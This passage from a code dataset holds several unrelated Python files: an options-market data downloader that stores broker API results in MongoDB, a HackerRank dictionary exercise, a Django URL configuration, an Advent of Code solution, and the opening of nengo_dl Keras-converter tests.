\"CLX\",\n \"CLDT\",\n \"CMCSA\",\n \"CNP\",\n \"CMG\",\n \"COF\",\n \"COP\",\n \"COST\",\n \"CSCO\",\n \"CTAS\",\n \"CVS\",\n \"CVX\",\n \"CZNC\",\n \"D\",\n \"DD\",\n \"DHR\",\n \"DIA\",\n \"DIS\",\n \"DJX\",\n \"DOV\",\n \"DOW\",\n \"DUK\",\n \"ECL\",\n \"ED\",\n \"EEM\",\n \"EMN\",\n \"EMR\",\n \"ESS\",\n \"EWW\",\n \"EWZ\",\n \"EXC\",\n \"EXPD\",\n \"EXPE\",\n \"F\",\n \"FB\",\n \"FDX\",\n \"FRT\",\n \"FXI\",\n \"GD\",\n \"GDX\",\n \"GE\",\n \"GEO\",\n \"GILD\",\n \"GLD\",\n \"GM\",\n \"GOOG\",\n \"GOOGL\",\n \"GPC\",\n \"GS\",\n \"GWW\",\n \"HAL\",\n \"HD\",\n \"HGX\",\n \"HON\",\n \"HRL\",\n \"HSBC\",\n \"IBM\",\n \"INTC\",\n \"IP\",\n \"ITW\",\n \"IWM\",\n \"IYR\",\n \"JNJ\",\n \"JNUG\",\n \"JPM\",\n \"KEY\",\n \"KHC\",\n \"KMB\",\n \"KMI\",\n \"KO\",\n \"KR\",\n \"KTB\",\n \"LEG\",\n \"LIN\",\n \"LLY\",\n \"LMT\",\n \"LOW\",\n \"LYB\",\n \"LYFT\",\n \"M\",\n \"MA\",\n \"MCD\",\n \"MDLZ\",\n \"MDT\",\n \"MET\",\n \"MKC\",\n \"MMM\",\n \"MO\",\n \"MPC\",\n \"MRK\",\n \"MS\",\n \"MSFT\",\n \"NDX\",\n \"NEE\",\n \"NFLX\",\n \"NGG\",\n \"NKE\",\n \"NNN\",\n \"NOV\",\n \"NUE\",\n \"NVDA\",\n \"O\",\n \"ODP\",\n \"OEX\",\n \"OHI\",\n \"OIH\",\n \"OMC\",\n \"ORCL\",\n \"OSX\",\n \"OXY\",\n \"OZK\",\n \"PBCT\",\n \"PEAK\",\n \"PEB\",\n \"PEP\",\n \"PFE\",\n \"PG\",\n \"PM\",\n \"PNR\",\n \"PPG\",\n \"PPL\",\n \"PYPL\",\n \"QCOM\",\n \"QQQ\",\n \"RLG\",\n \"RLV\",\n \"ROP\",\n \"ROST\",\n \"RUI\",\n \"RUT\",\n \"SBUX\",\n \"SHW\",\n \"SIXB\",\n \"SIXI\",\n \"SIXM\",\n \"SIXRE\",\n \"SIXU\",\n \"SIXV\",\n \"SKT\",\n \"SLB\",\n \"SLV\",\n \"SMH\",\n \"SO\",\n \"SOX\",\n \"SPG\",\n \"SPGI\",\n \"SPY\",\n \"SPX\",\n \"STAG\",\n \"SWK\",\n \"SYY\",\n \"T\",\n \"TAN\",\n \"TGT\",\n \"TLT\",\n \"TROW\",\n \"TSLA\",\n \"TXN\",\n \"UBER\",\n \"UNH\",\n \"UNP\",\n \"UPS\",\n \"USB\",\n \"USO\",\n \"UTY\",\n \"V\",\n \"VFC\",\n \"VIAC\",\n \"VIACA\",\n \"VIX\",\n \"VTR\",\n \"VZ\",\n \"WBA\",\n \"WDC\",\n \"WELL\",\n \"WFC\",\n \"WMT\",\n \"WPC\",\n \"WRK\",\n \"X\",\n \"XAU\",\n \"XBI\",\n \"XDA\",\n \"XDB\",\n \"XDC\",\n \"XDE\",\n \"XDN\",\n \"XDS\",\n \"XDZ\",\n \"XEO\",\n \"XLB\",\n \"XLE\",\n \"XLP\",\n \"XLU\",\n \"XLY\",\n \"XOM\",\n \"XOP\",\n \"XRT\",\n \"XSP\",\n]\n\n\nclass OptionsDataDownloader:\n \"\"\"OptionsDataDownloader downloads data from ToS API and stores it in a DB.\"\"\"\n\n def __init__(self):\n self.session = requests.session()\n self.db_handle = None\n\n def connect_and_initialize_db(self):\n if not self.db_handle:\n client = MongoClient()\n self.db_handle = client.options\n self.db_handle.options_data.create_index([(\"dataDate\", ASCENDING), (\"symbol\", ASCENDING)], unique=True)\n\n def get_and_pickle_data(self, symbols: List, path: str = \"\") -> List[str]:\n failed_symbols = []\n today_str = datetime.now().strftime(\"%Y%m%d\")\n path += today_str\n try:\n os.mkdir(path)\n except FileExistsError:\n logging.info(\"%s directory already exists\", today_str)\n for symbol in symbols:\n if [i for i in os.listdir(path) if i.startswith(symbol + \"_\")]:\n logging.info(\"%s already present, skipping\", symbol)\n continue\n data = self.get_option_chain_from_broker(symbol)\n if data[\"status\"] == \"FAILED\":\n logging.debug(\"Trying $%s.X\", symbol)\n data = self.get_option_chain_from_broker(\"$\" + symbol + \".X\")\n if data[\"status\"] == \"FAILED\":\n logging.info(\"%s FAILED!\", symbol)\n failed_symbols.append(symbol)\n continue\n with open(path + \"/\" + symbol + \"_\" + today_str + \"_data.pkl\", \"wb\") as p_data:\n pickle.dump(data, p_data)\n return failed_symbols\n\n def pickle_to_db(self, folder=None):\n self.connect_and_initialize_db()\n folder = datetime.now().strftime(\"%Y%m%d\") if folder is None else folder\n number_of_docs_before = self.db_handle.options_data.estimated_document_count()\n pkls = [i for i in os.listdir(folder) if i.endswith(\".pkl\")]\n pkls.sort()\n total_contracts = 0\n hod_data_list = []\n for pkl_file in pkls:\n with open(folder + \"/\" + pkl_file, \"rb\") as p_data:\n tos_data = pickle.load(p_data)\n total_contracts = total_contracts + tos_data[\"numberOfContracts\"]\n date_str = pkl_file.split(\"_\")[1]\n hod_data = tos_to_hod(tos_data, date_str)\n hod_data_list.append(hod_data)\n try:\n insert_result = self.db_handle.options_data.insert_one(hod_data)\n logging.debug(\"Inserted %s with id %s\", hod_data[\"symbol\"], insert_result.inserted_id)\n except DuplicateKeyError:\n logging.info(\"Document for %s from %s already in DB\", hod_data[\"symbol\"], hod_data[\"dataDate\"])\n continue\n hod_data_to_csv(hod_data_list, folder)\n logging.info(\"Converted %s contracts from ToS to HoD format\", total_contracts)\n number_of_docs_after = self.db_handle.options_data.estimated_document_count()\n logging.info(\"Inserted %s new documents to DB\", number_of_docs_after - number_of_docs_before)\n\n def csv_folder_to_db(self, folder_prefix, symbols=None, starting_path: str = \"\"):\n folders = [x for x in os.listdir(starting_path) if x.startswith(folder_prefix)]\n for folder in folders:\n path = starting_path + \"/\" + folder if starting_path else folder\n files = [x for x in os.listdir(path) if x.startswith(\"L2_options_\")]\n for file in files:\n path = \"/\".join([starting_path if starting_path else os.getcwd(), folder, file])\n self.csv_to_db(path, symbols)\n\n def csv_to_db(self, csv_path, symbols=None):\n self.connect_and_initialize_db()\n number_of_docs_before = self.db_handle.options_data.estimated_document_count()\n with open(csv_path) as csv_file:\n logging.info(\"Now processing %s\", csv_path)\n reader = csv.DictReader(csv_file)\n inserted_symbols = {}\n num_rows = 0\n for row in reader:\n current_symbol = row[\"UnderlyingSymbol\"]\n if symbols is None or current_symbol in symbols:\n num_rows = num_rows + 1\n try:\n inserted_symbols[current_symbol].append(row)\n except KeyError:\n inserted_symbols[current_symbol] = [row]\n for symbol in inserted_symbols:\n data = {}\n data[\"symbol\"] = symbol\n data_date = datetime.strptime(inserted_symbols[symbol][0][\"DataDate\"], \"%m/%d/%Y\")\n data[\"dataDate\"] = data_date.strftime(\"%Y%m%d\")\n data[\"chain\"] = inserted_symbols[symbol]\n try:\n insert_result = self.db_handle.options_data.insert_one(data)\n logging.info(\n \"Inserted %s with id %s\", data[\"symbol\"], insert_result.inserted_id,\n )\n except DuplicateKeyError:\n logging.info(\n \"Document for %s from %s already exists in DB\", data[\"symbol\"], data[\"dataDate\"],\n )\n number_of_docs_after = self.db_handle.options_data.estimated_document_count()\n logging.info(\n \"Inserted %s new dowcuments from %s CSV rows\", number_of_docs_after - number_of_docs_before, num_rows,\n )\n\n def get_option_chain_from_broker(self, symbol: str, retries: int = 60) -> Dict:\n while retries:\n try:\n response = self.session.get(\n TOS_OPTION_CHAIN_API_URL\n + \"?apikey=\"\n + os.environ.get(\"TOS_API_KEY\")\n + \"&symbol=\"\n + symbol\n + \"&includeQuotes=TRUE\",\n timeout=32,\n )\n except (ConnectionError, ReadTimeout, requests.exceptions.ConnectionError) as error:\n try:\n logging.error(\"Failed getting option chain for %s: %s\", symbol, error)\n except ProtocolError as p_error:\n try:\n logging.error(\"Failed getting option chain for %s: %s\", symbol, p_error)\n except (requests.exceptions.RequestException, requests.exceptions.ConnectionError,) as r_error:\n logging.error(\"Failed getting option chain for %s: %s\", symbol, r_error)\n retries = retries - 1\n time.sleep(2)\n continue\n try:\n data = response.json()\n except JSONDecodeError as error:\n logging.error(\"Failed to get JSON from %s response: %s\", symbol, error)\n retries = retries - 1\n time.sleep(2)\n continue\n if \"status\" in data.keys():\n return data\n if \"error\" in data.keys():\n logging.info(\"[%s]: %s\", symbol, data[\"error\"])\n else:\n logging.warning(\"Data has no status or error: %s\", data)\n retries = retries - 1\n time.sleep(2)\n return {}\n\n def get_symbols_in_db(self) -> List[str]:\n self.connect_and_initialize_db()\n symbols_in_db = self.db_handle.options_data.distinct(\"symbol\")\n logging.debug(\"Found %s symbols in DB: %s\", len(symbols_in_db), symbols_in_db)\n return symbols_in_db\n\n def get_todays_data(self, path: str = \"\"):\n symbols = self.get_symbols_in_db()\n for try_num in range(2):\n logging.info(\"Trial number %s\", try_num)\n symbols = self.get_and_pickle_data(symbols, path)\n logging.info(\"Got %s failing symbols: %s\", len(symbols), symbols)\n self.get_and_pickle_data(get_cboe_symbols(), path)\n symbols = MANDATORY_SYMBOLS\n for try_num in range(8):\n logging.info(\"Mandatory symbols: Trial number %s\", try_num)\n symbols = self.get_and_pickle_data(symbols, path)\n logging.info(\"Got %s failing symbols: %s\", len(symbols), symbols)\n if symbols:\n logging.error(\"**************************************************\")\n logging.error(\"COULD NOT GET THESE MANDATORY SYMBOLS: %s\", symbols)\n logging.error(\"**************************************************\")\n\n\ndef tos_to_hod(tos_data: dict, date_str: str) -> dict:\n hod_data = {}\n if tos_data[\"symbol\"].startswith(\"$\") and tos_data[\"symbol\"].endswith(\".X\"):\n symbol = tos_data[\"symbol\"][1:-2]\n else:\n symbol = tos_data[\"symbol\"]\n hod_data[\"symbol\"] = symbol\n hod_data[\"dataDate\"] = date_str\n logging.debug(\"Found %s contracts in ToS for %s\", tos_data[\"numberOfContracts\"], symbol)\n hod_data[\"chain\"] = []\n underlying_price = tos_data[\"underlying\"][\"last\"] if tos_data[\"underlying\"] else tos_data[\"underlyingPrice\"]\n for option_type in [\"callExpDateMap\", \"putExpDateMap\"]:\n for expiration_str, expiration_row in tos_data[option_type].items():\n expiration = expiration_str.split(\":\")[0].replace(\"-\", \"\")\n for strike, strike_list in expiration_row.items():\n hod_chain_row = {}\n hod_chain_row[\"UnderlyingSymbol\"] = symbol\n hod_chain_row[\"UnderlyingPrice\"] = str(underlying_price)\n for entry in strike_list:\n hod_chain_row[\"Exchange\"] = entry[\"exchangeName\"]\n hod_chain_row[\"OptionSymbol\"] = entry[\"symbol\"]\n hod_chain_row[\"OptionExt\"] = \"\"\n hod_chain_row[\"Type\"] = \"call\" if option_type == \"callExpDateMap\" else \"put\"\n hod_chain_row[\"Expiration\"] = (\"/\").join([expiration[4:6], expiration[6:8], expiration[0:4]])\n hod_chain_row[\"DataDate\"] = (\"/\").join([date_str[4:6], date_str[6:8], date_str[0:4]])\n hod_chain_row[\"Strike\"] = strike\n hod_chain_row[\"Last\"] = str(entry[\"last\"])\n hod_chain_row[\"Bid\"] = str(entry[\"bid\"])\n hod_chain_row[\"Ask\"] = str(entry[\"ask\"])\n hod_chain_row[\"Volume\"] = str(entry[\"totalVolume\"])\n hod_chain_row[\"OpenInterest\"] = str(entry[\"openInterest\"])\n try:\n hod_chain_row[\"IV\"] = str(round(entry[\"volatility\"] / 100, 2))\n except TypeError:\n hod_chain_row[\"IV\"] = \"NaN\"\n hod_chain_row[\"Delta\"] = str(entry[\"delta\"])\n hod_chain_row[\"Gamma\"] = str(entry[\"gamma\"])\n try:\n hod_chain_row[\"Theta\"] = str(round(entry[\"theta\"] * 100, 2))\n except TypeError:\n hod_chain_row[\"Theta\"] = \"NaN\"\n hod_chain_row[\"Vega\"] = str(round(entry[\"vega\"] * 100, 2))\n hod_chain_row[\"AKA\"] = entry[\"symbol\"]\n hod_data[\"chain\"].append(hod_chain_row)\n return hod_data\n\n\ndef hod_data_to_csv(hod_data: list, date_str: str):\n with open(\"options_\" + date_str + \".csv\", \"w\") as csv_file:\n csv_writer = csv.writer(csv_file)\n for symbol_data in hod_data:\n for row in symbol_data[\"chain\"]:\n csv_writer.writerow(row.values())\n\n\ndef get_cboe_symbols() -> List[str]:\n rows = requests.get(CBOE_SYMBOLS_URL).text.splitlines()\n symbols = []\n for row in rows:\n try:\n symbol_candidate = row.split('\",\"')[1]\n except IndexError:\n logging.info(\"Row is not parsable: %s\", row)\n continue\n if \"#\" not in symbol_candidate:\n symbols.append(symbol_candidate)\n symbols = list(set(symbols))\n symbols.sort()\n logging.info(\"Got %s symbols from CBOE\", len(symbols))\n if len(symbols) < 9000:\n raise \"Too few symbols. You should check what's going on\"\n return symbols\n\n\ndef replace_dots_in_keys(dictionary: Dict) -> Dict:\n new_dict = {}\n for key, value in dictionary.items():\n if isinstance(value, Dict):\n value = replace_dots_in_keys(value)\n new_dict[key.replace(\".\", \",\")] = value\n return new_dict\n\n\ndef main():\n logging.getLogger().setLevel(logging.INFO)\n options_data_downloader = OptionsDataDownloader()\n while True:\n if datetime.now().weekday() < 5:\n today_str = datetime.now().strftime(\"%Y%m%d\")\n if today_str not in os.listdir(TOS_DOWNLOAD_DIR):\n if datetime.now().hour > 14:\n options_data_downloader.get_todays_data(TOS_DOWNLOAD_DIR)\n else:\n logging.info(\"Waiting until 3pm\")\n else:\n logging.info(\"%s directory already present\", today_str)\n else:\n logging.info(\"No trading today\")\n time.sleep(300)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edsonfox/options-data-python","sub_path":"options_data_downloader.py","file_name":"options_data_downloader.py","file_ext":"py","file_size_in_byte":16326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71678914639","text":"# Given n names and phone numbers, assemble a phone book that maps friends' names to their respective phone numbers. \n# You will then be given an unknown number of names to query your phone book for. \n# For each queried, print the associated entry from your phone book on a new line in the form name=phoneNumber; \n# if an entry for is not found, print Not found instead.\n\n# Number of key-value pairs\nn = int(input())\n\n# Loop through the number of pairs, appending the input into the names list\nnames = [input().split() for i in range(n)]\n\n# Loop through the list, inserting the key and val into the phone book dictionary\nphone_book = {key: val for key, val in names}\n\n# While there is still name input, check in the phonebook if the name existed\n# If it exist, print out the name and number\nwhile True:\n try:\n name = input()\n if name in phone_book:\n print(\"%s=%s\" % (name, phone_book[name]))\n else:\n print(\"Not found\")\n except:\n break","repo_name":"benedictusdps/hackerrank","sub_path":"Tutorial_30_Days_of_Code/Day_8/dictionaries_and_maps.py","file_name":"dictionaries_and_maps.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21736763454","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.decorators import login_required\nfrom tfb import views as base_views\nfrom tfb.messages import views as message_views\nfrom tfb.matchup import views as matchup_views\nfrom tfb.player_card import views as player_card_views\nfrom tfb.top_player_list import views as top_player_list\nfrom tfb.draft import views as draft_views\nfrom tfb.profile import views as profile_views\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', base_views.AboutView.as_view()),\n url(r'^about/$', base_views.AboutView.as_view()),\n\turl(r'^home/$', base_views.HomeView.as_view(), name='home'),\n\turl(r'^players/$', base_views.HomeView.as_view(), name='home'),\n\turl(r'^blue/$', base_views.BlankView.as_view(), name='blank'),\n\turl(r'^delete_account/$', profile_views.DeleteAccountView.as_view(), name='delete'),\n\turl(r'^player/(?P\\w+)/$', player_card_views.PlayerPageView.as_view(), name='player'),\n url(r'^uteam/(?P\\w+)/$', base_views.NotMyTeamView.as_view(), name='uteam'),\n url(r'^uteam/$', base_views.MyTeamView.as_view()),\n url(r'^myteam/$', login_required(base_views.MyTeamView.as_view()), name=\"myteam\"),\n url(r'^messages/$', message_views.MessageView.as_view(),name='message'),\n\turl(r'^league/$', login_required(base_views.league_page),name='league'),\n url(r'^league/(?P\\w+)/$', login_required(base_views.league_page),name='league'),\n url(r'^leagueadmin/$', base_views.leagueadmin,name='leagueadmin'),\n url(r'^leagueadmin/(?P\\w+)/$', base_views.leagueadmin,name='leagueadmin'),\n\turl(r'^login/$', 'django.contrib.auth.views.login'),\n\turl(r'^logout/$', base_views.logout_user,name='logout_user'),\n\turl(r'^profile/$', login_required(profile_views.ProfileView.as_view()), name='ProfileView'),\n url(r'^profile/edit/$', profile_views.EditAccountView.as_view(), name='profileedit'),\n\turl(r'^joinleague/$', base_views.joinleague,name='joinleague'),\n\turl(r'^pickup/(?P\\w+)/$', base_views.pickup,name='pickup'),\n\turl(r'^list/(?P\\w+)/$', base_views.list_player,name='list'),\n url(r'^draft/$', draft_views.draftpage, name='draftpage'),\n url(r'^drag/$', draft_views.drag_and_drop, name='draftpage'),\n url(r'^matchup/$', login_required(matchup_views.MatchupPageView.as_view()), name='matchup'),\n url(r'^matchup/(?P\\w+)/$', login_required(matchup_views.MatchupPageView.as_view()),name='matchup'),\n url(r'^sysadmin/$', base_views.sysadmin,name='sysadmin'),\n url(r'^sysadmin/(?P\\w+)/(?P.*?)$', base_views.sysadmin,name='sysadmin'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^playerpage/$', top_player_list.playerpage),\n url(r'^playernotfound/$', top_player_list.PlayerNotFound.as_view()),\n url(r'^playerpage/(?P\\w+)', top_player_list.playerpage),\n url(r'^playerpage/(?P\\w+)', top_player_list.playerpage),\n url(r'^leaguelist/(?P\\w+)', base_views.league_list),\n url(r'^transactions/$', base_views.transactions_page),\n url(r'^accounts/', include('registration.backends.default.urls')),\n)\n","repo_name":"taddeimania/tfb","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"10105510273","text":"from io import TextIOWrapper\nfrom dataclasses import dataclass\nimport re\n\n\ndef abba(string: str) -> bool:\n for i in range(len(string)-3):\n if string[i] == string[i+3] and string[i+1] == string[i+2] and string[i] != string[i+1]:\n return True\n return False\n\n\ndef aba(string: str) -> bool:\n patterns = set()\n for i in range(len(string)-2):\n if string[i] == string[i+2] and string[i+1] != string[i+2]:\n patterns.add(string[i:i+3])\n return patterns\n\n\ndef main(file: TextIOWrapper):\n ips = [line.strip() for line in file.readlines()]\n abba_count = 0\n aba_count = 0\n for ip in ips:\n found = False\n parts = re.split(r'\\]|\\[', ip)\n for i, part in enumerate(parts):\n if i%2 == 0 and abba(part):\n found = True\n elif abba(part):\n found = False\n break\n abba_count += found\n\n non_bracket_aba = set()\n bracket_aba = set()\n for i, part in enumerate(parts):\n if i%2 == 0:\n non_bracket_aba |= aba(part)\n else:\n bracket_aba |= aba(part)\n found_aba = False\n for outside in bracket_aba:\n for inside in non_bracket_aba:\n if outside[0] == inside[1] and inside[0] == outside[1]:\n aba_count += 1\n found_aba = True\n break\n if found_aba:\n break\n\n return abba_count,aba_count\n","repo_name":"sfmalloy/advent-of-code-2016","sub_path":"solutions/d07.py","file_name":"d07.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8504909005","text":"# pylint: disable=missing-docstring\n\nimport contextlib\n\nimport nengo\nimport numpy as np\nimport pytest\nimport tensorflow as tf\nfrom packaging import version\n\nfrom nengo_dl import compat, config, converter, utils\n\n\ndef _test_convert(inputs, outputs, inp_vals=None, **kwargs):\n kwargs.setdefault(\"allow_fallback\", False)\n\n model = tf.keras.Model(inputs=inputs, outputs=outputs)\n\n conv = converter.Converter(model, **kwargs)\n\n assert conv.verify(training=False, inputs=inp_vals)\n assert conv.verify(training=True, inputs=inp_vals)\n\n\ndef test_dense(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.Input(shape=(2, 2))\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(units=5, activation=\"relu\")(x)\n x = tf.keras.layers.Dense(units=6, bias_initializer=tf.initializers.ones())(x)\n x = tf.keras.layers.Dense(units=7, use_bias=False)(x)\n\n _test_convert(inp, x)\n\n\ndef test_conv(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.Input(shape=(16, 4))\n x = tf.keras.layers.Conv1D(filters=8, kernel_size=2, padding=\"same\")(x)\n x = tf.keras.layers.Reshape((4, 4, 8))(x)\n x = tf.keras.layers.Conv2D(filters=8, kernel_size=3, activation=\"sigmoid\")(x)\n x = tf.keras.layers.Reshape((4, 4, 2))(x)\n x = tf.keras.layers.Conv2D(filters=8, kernel_size=1, strides=2)(x)\n x = tf.keras.layers.Reshape((2, 2, 2, 4))(x)\n x = tf.keras.layers.Conv3D(filters=32, kernel_size=2)(x)\n if utils.tf_gpu_installed:\n x = tf.keras.layers.Reshape((2, 4, 4))(x)\n x = tf.keras.layers.Conv2D(\n filters=4, kernel_size=3, data_format=\"channels_first\"\n )(x)\n\n _test_convert(inp, x)\n\n\ndef test_conv_groups(seed):\n tf.random.set_seed(seed)\n\n inp = x = tf.keras.Input(shape=(28, 28, 4))\n x = tf.keras.layers.Conv2D(filters=4, kernel_size=3, groups=4)(x)\n\n model = tf.keras.Model(inp, x)\n\n with contextlib.suppress() if compat.HAS_NENGO_3_2_1 else pytest.raises(\n TypeError, match=\"Convolution layers require Nengo>3.2.0\"\n ):\n # for some reason this crashes on the GPU\n with tf.device(\"/cpu:0\"):\n conv = converter.Converter(model, allow_fallback=False)\n\n assert conv.verify(training=False)\n # TODO: this fails on certain CPU platforms, seems to be a TF bug\n # assert conv.verify(training=True)\n\n\ndef test_activation():\n inp = x = tf.keras.Input(shape=(4,))\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Activation(tf.nn.relu)(x)\n x = tf.keras.layers.Activation(tf.keras.activations.relu)(x)\n x = tf.keras.layers.Activation(\"sigmoid\")(x)\n x = tf.keras.layers.Activation(tf.nn.sigmoid)(x)\n x = tf.keras.layers.Activation(tf.keras.activations.sigmoid)(x)\n if version.parse(nengo.__version__) >= version.parse(\"3.1.0\"):\n x = tf.keras.layers.Activation(\"tanh\")(x)\n x = tf.keras.layers.Activation(tf.nn.tanh)(x)\n x = tf.keras.layers.Activation(tf.keras.activations.tanh)(x)\n\n _test_convert(inp, x)\n\n inp = x = tf.keras.Input(shape=(4,))\n x = tf.keras.layers.Activation(tf.keras.activations.elu)(x)\n\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(TypeError, match=\"Unsupported activation type\"):\n converter.Converter(model, allow_fallback=False)\n\n with pytest.warns(UserWarning, match=\"falling back to a TensorNode\"):\n conv = converter.Converter(model, allow_fallback=True)\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\n@pytest.mark.training\ndef test_fallback(Simulator):\n inp = x = tf.keras.Input(shape=(2, 2))\n\n class MyLayer(tf.keras.layers.Layer):\n def build(self, input_shape):\n super().build(input_shape)\n self.kernel = self.add_weight(\n shape=(), initializer=tf.initializers.RandomUniform()\n )\n\n def call(self, inputs):\n assert inputs.shape[1:] == (2, 2)\n return tf.reshape(\n inputs * tf.cast(self.kernel, inputs.dtype), shape=(-1, 4)\n )\n\n layer = MyLayer()\n x = layer(x)\n x = tf.keras.layers.Reshape((2, 2))(x)\n x = layer(x)\n x = tf.keras.layers.Reshape((2, 2))(x)\n x = layer(x)\n\n model = tf.keras.Model(inp, x)\n conv = converter.Converter(model, allow_fallback=True)\n\n with Simulator(conv.net) as sim:\n # check that weights are being shared correctly\n assert len(sim.keras_model.trainable_weights) == 1\n assert sim.keras_model.trainable_weights[0].shape == ()\n\n assert conv.verify(training=False)\n assert conv.verify(training=True)\n\n\ndef test_add():\n inp = [tf.keras.Input(shape=(2, 2)), tf.keras.Input(shape=(2, 2))]\n out = tf.keras.layers.Add()(inp)\n\n _test_convert(inp, out)\n\n\ndef test_average():\n inp = [tf.keras.Input(shape=(2, 2)), tf.keras.Input(shape=(2, 2))]\n out = tf.keras.layers.Average()(inp)\n\n _test_convert(inp, out)\n\n\ndef test_concatenate(rng):\n inp = [\n tf.keras.Input(shape=(1, 4)),\n tf.keras.Input(shape=(2, 4)),\n tf.keras.Input(shape=(3, 5)),\n ]\n x = tf.keras.layers.Concatenate(axis=1)(inp[:2])\n x = tf.keras.layers.Concatenate(axis=-1)([x, inp[2]])\n\n _test_convert(\n inp,\n x,\n inp_vals=[\n rng.uniform(size=(5, 1, 4)),\n rng.uniform(size=(5, 2, 4)),\n rng.uniform(size=(5, 3, 5)),\n ],\n )\n\n inp = [tf.keras.Input(shape=(1,)), tf.keras.Input(shape=(1,))]\n x = tf.keras.layers.Concatenate(axis=0)(inp)\n model = tf.keras.Model(inp, x)\n\n with pytest.raises(TypeError, match=\"concatenate along batch dimension\"):\n converter.Converter(model, allow_fallback=False)\n\n\ndef test_zero_padding():\n inp = x = tf.keras.Input(shape=(14, 2))\n x = tf.keras.layers.ZeroPadding1D(padding=1)(x)\n x = tf.keras.layers.Reshape((4, 4, 2))(x)\n x = tf.keras.layers.ZeroPadding2D(padding=((2, 0), (0, 4)))(x)\n x = tf.keras.layers.Reshape((2, 2, 2, 12))(x)\n x = tf.keras.layers.ZeroPadding3D(padding=(1, 0, 3))(x)\n if utils.tf_gpu_installed:\n x = tf.keras.layers.Reshape((12, 8, 8))(x)\n x = tf.keras.layers.ZeroPadding2D(padding=1, data_format=\"channels_first\")(x)\n\n _test_convert(inp, x)\n\n\ndef test_batch_normalization(rng):\n inp = tf.keras.Input(shape=(4, 4, 3))\n out = []\n out.append(tf.keras.layers.BatchNormalization(axis=1)(inp))\n out.append(tf.keras.layers.BatchNormalization(axis=2)(inp))\n out.append(tf.keras.layers.BatchNormalization()(inp))\n out.append(tf.keras.layers.BatchNormalization(center=False, scale=False)(inp))\n\n model = tf.keras.Model(inputs=inp, outputs=out)\n\n # train it for a bit to initialize the moving averages\n model.compile(loss=tf.losses.mse, optimizer=tf.optimizers.SGD())\n model.fit(\n rng.uniform(size=(1024, 4, 4, 3)),\n [rng.uniform(size=(1024, 4, 4, 3))] * len(out),\n epochs=2,\n )\n\n inp_vals = [rng.uniform(size=(32, 4, 4, 3))]\n\n # test using tensornode fallback\n # TODO: there is some bug with using batchnormalization layers inside\n # nengo_dl.Layers in general (unrelated to converting)\n # conv = convert.Converter(allow_fallback=True, inference_only=False)\n # with pytest.warns(UserWarning, match=\"falling back to nengo_dl.Layer\"):\n # net = conv.convert(model)\n #\n # assert conv.verify(model, net, training=False, inputs=inp_vals)\n # assert conv.verify(model, net, training=True, inputs=inp_vals)\n\n # test actually converting to nengo objects\n conv = converter.Converter(model, allow_fallback=False, inference_only=True)\n\n assert conv.verify(training=False, inputs=inp_vals, atol=1e-7)\n\n with pytest.raises(ValueError, match=\"number of trainable parameters\"):\n # we don't expect the verification to pass for training=True, since we froze\n # the batch normalization in the nengo network (but not the keras model)\n conv.verify(training=True, inputs=inp_vals)\n\n # error if inference_only=False\n with pytest.raises(TypeError, match=\"unless inference_only=True\"):\n converter.Converter(model, allow_fallback=False, inference_only=False)\n\n # no error if inference_only=False but layer is not trainable\n inp = tf.keras.Input(shape=(4, 4, 3))\n out = tf.keras.layers.BatchNormalization(axis=1, trainable=False)(inp)\n model = tf.keras.Model(inp, out)\n conv = converter.Converter(model, inference_only=False, allow_fallback=False)\n conv.verify(training=True, inputs=inp_vals)\n\n\ndef test_relu():\n inp = tf.keras.Input(shape=(10,))\n out = tf.keras.layers.ReLU()(inp)\n\n _test_convert(inp, out, inp_vals=[np.linspace(-1, 1, 10)[None, :]])\n\n\ndef test_avg_pool(rng):\n n_filters = 6\n inp = tf.keras.Input(shape=(64, n_filters))\n outputs = [tf.keras.layers.AvgPool1D()(inp)]\n\n x = tf.keras.layers.Reshape((8, 8, n_filters))(inp)\n outputs.append(tf.keras.layers.AvgPool2D()(x))\n\n x = tf.keras.layers.Reshape((8, 8, n_filters))(inp)\n outputs.append(tf.keras.layers.AvgPool2D(pool_size=3, strides=2)(x))\n\n x = tf.keras.layers.Reshape((4, 4, 4, n_filters))(inp)\n outputs.append(tf.keras.layers.AvgPool3D()(x))\n\n if utils.tf_gpu_installed:\n x = tf.keras.layers.Reshape((n_filters, 8, 8))(inp)\n outputs.append(\n tf.keras.layers.AvgPool2D(\n pool_size=3, strides=2, data_format=\"channels_first\"\n )(x)\n )\n\n _test_convert(inp, outputs, inp_vals=[rng.uniform(size=(3, 64, n_filters))])\n\n\ndef test_global_avg_pool(rng):\n n_filters = 6\n inp = tf.keras.Input(shape=(64, n_filters))\n out0 = tf.keras.layers.GlobalAvgPool1D()(inp)\n\n x = tf.keras.layers.Reshape((8, 8, n_filters))(inp)\n out1 = tf.keras.layers.GlobalAvgPool2D()(x)\n\n x = tf.keras.layers.Reshape((n_filters, 8, 8))(inp)\n out2 = tf.keras.layers.GlobalAvgPool2D(data_format=\"channels_first\")(x)\n\n x = tf.keras.layers.Reshape((4, 4, 4, n_filters))(inp)\n out3 = tf.keras.layers.GlobalAvgPool3D()(x)\n\n _test_convert(\n inp, [out0, out1, out2, out3], inp_vals=[rng.uniform(size=(3, 64, n_filters))]\n )\n\n\n@pytest.mark.training\ndef test_densenet(Simulator, seed):\n tf.random.set_seed(seed)\n model = tf.keras.applications.densenet.DenseNet121(\n weights=None, include_top=False, input_shape=(112, 112, 3)\n )\n\n conv = converter.Converter(\n model, allow_fallback=False, 